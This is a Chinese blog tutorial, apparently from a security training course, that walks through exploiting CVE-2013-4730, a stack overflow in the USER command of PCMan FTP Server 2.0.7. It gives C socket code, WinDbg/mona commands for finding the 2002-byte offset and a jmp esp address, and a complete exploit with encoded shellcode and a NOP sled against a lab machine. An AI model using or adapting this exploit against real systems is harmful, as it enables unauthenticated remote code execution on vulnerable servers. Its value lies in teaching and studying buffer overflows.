zoukankan      html  css  js  c++  java
  • First_CVE


    First_CVE远程溢出攻击

    CVE-2013-4730

    概述

    通过文档得知,此软件由于未能有效处理FTP命令的字符长度,进而引发栈溢出漏洞,导致攻击者可以远程执行任何命令。

    令人激动的是,用于FTP登陆的“USER”命令即可出发此漏洞,也就是说我们在未提前获得目标的FTP访问权限的前提下,即可对其进行溢出攻击,因此这个漏洞造成的影响非常严重。

    准备

    新建项目-桌面向导-关闭安全开发生命周期(SDL)检查

    1565783983596[10]


    #include "pch.h"
    #include <iostream>
    #include <WinSock2.h>
    #pragma comment(lib,"Ws2_32.lib")
    #include <windows.h>
    int main()
    {
    // 1.初始化Winsock服务
    WSADATA stWSA;
    WSAStartup(0x0202, &stWSA);

    // 2.创建一个原始套接字
    SOCKET stListen = INVALID_SOCKET;
    stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);

    // 3.在任意地址(INADDR)ANY)上绑定一个端口21
    SOCKADDR_IN stService;
    stService.sin_addr.s_addr = inet_addr("127.0.0.1");
    stService.sin_port = htons(21);
    stService.sin_family = AF_INET;

    // 4.接受欢迎语
    connect(stListen, (SOCKADDR*)&stService, sizeof(stService));
    char szRecv[0x100] = { 0 };
    recv(stListen, szRecv, sizeof(szRecv), 0);

    // 5.发送登录请求
    char *pCommand = "USER Anonymous";
    send(stListen, pCommand, strlen(pCommand), 0);

    // 6.关闭相关句柄
    recv(stListen, szRecv, sizeof(szRecv), 0);
    closesocket(stListen);
    WSACleanup();
    }

    运行,会向程序发送"USER Anonymous"

    程序正常响应登录

    1565782115719[10]

    启动mona

    WinDbg+Mona2

    WinDbg附加程序

    命令:.load pykd.pyd

    命令:!py mona

    1565782297178[10]

    Mona生成字符串

    命令:!py mona pc 3000

    1565782480342[10]

    利用生成的3000个字符的字符串造成程序崩溃


    #include "pch.h"
    #include <iostream>
    #include <WinSock2.h>
    #pragma comment(lib,"Ws2_32.lib")
    #include <windows.h>
    int main()
    {
    // 1.初始化Winsock服务
    WSADATA stWSA;
    WSAStartup(0x0202, &stWSA);

    // 2.创建一个原始套接字
    SOCKET stListen = INVALID_SOCKET;
    stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);

    // 3.在任意地址(INADDR)ANY)上绑定一个端口21
    SOCKADDR_IN stService;
    stService.sin_addr.s_addr = inet_addr("192.168.253.130");
    stService.sin_port = htons(21);
    stService.sin_family = AF_INET;

    // 4.接受欢迎语
    connect(stListen, (SOCKADDR*)&stService, sizeof(stService));
    char szRecv[0x100] = { 0 };
    recv(stListen, szRecv, sizeof(szRecv), 0);

    // 5.发送登录请求
    char *pCommand = "USER Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9";
    send(stListen, pCommand, strlen(pCommand), 0);

    // 6.关闭相关句柄
    recv(stListen, szRecv, sizeof(szRecv), 0);
    closesocket(stListen);
    WSACleanup();
    }

    再次发送命令,程序断下来

    1565783220659[10]

    程序崩溃位置0x6f43376f.因为EIP被覆盖成了0x6f43376f,借助mona计算出溢出点

    ! py mona po 0x6f43376f

    1565783307480[10]

    偏移在2002的位置

    接下来借助mona找jmp esp

    命令:!py mona jmp -r esp -m "kernel32.dll"

    1565783520500[10]

    获取到可以用来跳板的地址0x773af8f7

    完善ShellCode

    1.地址

    2.偏移

    3.加解密

    #include "pch.h" 
    #include <winsock2.h> 
    #include <windows.h>
    #pragma comment(lib,"Ws2_32.lib")
    #include <tchar.h>
    #include <ios>
    #define _WINSOCK_DEPRECATED_NO_WARNINGS 1
    // System : Windows 7 SP1
    // Software: PCMan FTP Server
    // Version : 2.0.7
    // Type   : Remote Code Execution Exploits
    // CVE     : 2013-4730
    // CVE Link: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4730
    // Author : A1Pass[15PB.Com]

    #define KEY "x07"     // Encode Key   = 0x07
    #define SIZE "x36x01" // Payload Size = 0x0136
    char bShellcode[] =
    "x33xC0xE8xFFxFFxFFxFFxC3x58x8Dx70x1Bx33xC9x66xB9"
    SIZE "x8Ax04x0Ex34" KEY "x88x04x0ExE2xF6x80x34x0E" KEY
    "xFFxE6"
    "x67x84xEBx27xECx4Bx40x62x73x57x75x68x64x46x63x63"
    "x75x62x74x74x4Bx68x66x63x4Bx6Ex65x75x66x75x7Ex42"
    "x7Fx46x07x52x74x62x75x34x35x29x63x6Bx6Bx07x4Ax62"
    "x74x74x66x60x62x45x68x7Fx46x07x42x7Fx6Ex73x57x75"
    "x68x64x62x74x74x07x4Fx62x6Bx6Bx68x27x36x32x57x45"
    "x26x07xEFx07x07x07x07x5Cx63x8Cx32x37x07x07x07x8C"
    "x71x0Bx8Cx71x1Bx8Cx31x8Cx51x0Fx54x55xEFx15x07x07"
    "x07x8CxF7x8Ax4CxBAx56x55xF8xD7x54x51x57x55xEFx69"
    "x07x07x07x52x8CxEBx84xEBx0Bx55x8Cx52x0Fx8Cx75x3B"
    "x8Ax33x35x8Cx71x7Fx8Ax33x35x8Cx79x1Bx8Ax3Bx3Dx8E"
    "x7AxFBx8Cx79x27x8Ax3Bx3Dx8Ex7AxFFx8Cx79x23x8Ax3B"
    "x3Dx8Ex7AxF3x34xC7xECx06x47x8Cx72xFFx8Cx33x81x8C"
    "x52x0Fx8Ax33x35x8Cx5Ax0Bx8Ax7CxA8xBEx09x07x07x07"
    "xFBxF4xA1x72xE4x8Cx72xF3x34xF8x61x8Cx3Bx41x8Cx52"
    "xFBx8Cx33xBDx8Cx52x0Fx8Ax03x35x5Dx8CxE2x5AxC5x0F"
    "x07x52x8CxEBx84xEBx0Fx8Cx5Ax13x8Ax4CxCBx6Dx07x6D"
    "x07x56xF8x52x0Bx8Ax4CxD0x56x57xF8x52x17x8Ex42xFB"
    "x8Ax4CxE4x56xF8x72x0FxF8x52x17x8Ex42xFFx8Ax4CxE8"
    "x6Dx07x56x56x6Dx07xF8x52xFBx6Dx07xF8x52xFFx8CxE2"
    "x5AxC5x17x07x07";

    int _tmain(int argc, _TCHAR* argv[])
    {
    // 1. 初始化Winsock服务
    WSADATA stWSA;
    WSAStartup(0x0202, &stWSA);
    // 2. 创建一个原始套接字
    SOCKET stListen = INVALID_SOCKET;;
    stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
    // 3. 在任意地址(INADDR_ANY)上绑定一个端口21
    SOCKADDR_IN stService;
    stService.sin_addr.s_addr = inet_addr("192.168.253.130");
    stService.sin_port = htons(21);
    stService.sin_family = AF_INET;
    connect(stListen, (SOCKADDR *)& stService, sizeof(stService));
    // 4. 构造Exploit
    char cExpolit[5000] = { 0x00 };           // Exploit容器
    char cFill[5000] = { 0x00 };           // 填充字节
    char cNOP[51] = { 0x00 };           // 滑板指令区
    char cRetnAddr[5] = "xf7xf8x3ax77"; // JMP ESP:0x75DFE555
    memset(cFill, 'A', 2002); // 由Mona得到的偏移
    memset(cNOP, 'x90', 50); // 少填充1字节,如果变量cNOP后面不为0x00,也会被当成字符链接进来
    sprintf_s(cExpolit, "%s%s%s%s%s%s", "USER ", cFill, cRetnAddr, cNOP, bShellcode, " ");
    // 5. 向FTP发送Exploit
    char szRecv[0x100] = { 0 };
    char *pCommand = NULL;
    // 5.1 接受欢迎语
    recv(stListen, szRecv, sizeof(szRecv), 0);
    // 5.2 发送登陆请求
    send(stListen, cExpolit, strlen(cExpolit), 0);
    recv(stListen, szRecv, sizeof(szRecv), 0);
    // 6. 关闭相关句柄并释放相关资源
    closesocket(stListen);
    WSACleanup();
    return 0;
    }

    远程溢出攻击成功

    1565783798380[5]

    弹出对话框。

  • 相关阅读:
    excel中如何筛选出同一列有重复的数据
    JTextFile换行
    DOM事件对象用法
    js事件监听
    webstorm 破解方法
    vux使用
    vue动态添加当前事件下的class
    subline3 如何设置es6高亮
    vueJS+ES6开发移动端APP实战项目笔记
    css命名规范和书写规范
  • 原文地址:https://www.cnblogs.com/ltyandy/p/11354446.html
Copyright © 2011-2022 走看看